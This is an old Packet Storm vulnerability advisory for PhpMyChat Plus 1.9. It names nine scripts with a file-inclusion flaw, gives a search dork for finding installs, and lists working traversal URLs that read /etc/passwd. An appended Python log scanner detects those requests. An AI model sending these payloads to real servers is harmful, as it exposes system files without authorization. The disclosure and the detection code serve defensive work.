phpmychatPlus19.txt

2006-11-09T00:00:00
ID PACKETSTORM:51799
Type packetstorm
Reporter ajann
Modified 2006-11-09T00:00:00

Description

`*******************************************************************************  
# Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities  
  
# Author : ajann  
  
# Dork : phpMyChat plus  
  
# Vuln;  
  
*******************************************************************************  
[Files]  
avatar.php  
colorhelp_popup.php  
color_popup.php  
index.php  
index1.php  
/lib/connected_users.lib.php  
/lib/index.lib.php  
logs.php  
phpMyChat.php3  
[/Files]  
  
[Code,1]  
connected_users.lib.php Error:  
  
..  
....  
require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");  
require("./${ChatPath}/lib/clean.lib.php");  
....  
..  
  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] L=[file]  
Key [:] ChatPath=[file]  
  
  
Example:  
  
http://target.com/path/avatar.php?ChatPath=../../etc/passwd  
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd  
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd  
http://target.com/path/index.php?ChatPath=../../etc/passwd  
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd  
http://target.com/path/avatar.php?ChatPath=../../etc/passwd  
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd  
http://target.com/path/logs.php?L=../../etc/passwd  
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd  
  
  
  
# ajann,Turkey  
# ...  
# I'm not a Hacker!  
`
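
An added detection example, not part of the original advisory: a Python scan of web access-log lines for requests to the scripts listed above whose ChatPath (or, for logs.php, L) parameter carries a traversal sequence, an absolute path or a URL. The access-log format, the sample lines, the value "english" and the function name scan() are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> request parameter, taken from the advisory's [Files] and Key lists.
AFFECTED = dict.fromkeys(
    ["avatar.php", "colorhelp_popup.php", "color_popup.php", "index.php",
     "index1.php", "connected_users.lib.php", "index.lib.php",
     "phpMyChat.php3"], "ChatPath")
AFFECTED["logs.php"] = "L"

# Request line as it appears in a common/combined-format access log (assumed).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Values that have no business in a path fragment passed to require():
# directory traversal, absolute paths, URL schemes, NUL bytes.
SUSPICIOUS = re.compile(r"\.\.[/\\]|^[/\\]|://|\x00")


def scan(lines):
    """Return (line_number, script, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = AFFECTED.get(script)
        if param is None:
            continue  # not one of the scripts named in the advisory
        # parse_qsl URL-decodes values, so ..%2F is seen as ../
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and SUSPICIOUS.search(value):
                hits.append((number, script, value))
    return hits


# Constructed sample log lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Nov/2006:10:00:01 +0000] "GET /chat/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/Nov/2006:10:00:07 +0000] "GET /chat/avatar.php?ChatPath=../../etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.44 - - [09/Nov/2006:10:00:09 +0000] "GET /chat/logs.php?L=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1432',
    '192.0.2.17 - - [09/Nov/2006:10:00:12 +0000] "GET /chat/logs.php?L=english HTTP/1.1" 200 2048',
    '192.0.2.44 - - [09/Nov/2006:10:00:15 +0000] "GET /chat/other.php?ChatPath=../../etc/passwd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, script, value in scan(SAMPLE_LOG):
        print(f"line {number}: {script} <- {value!r}")
```

Only GET query strings are visible in an access log; parameters sent in a POST body need request-body logging or a WAF rule to be seen.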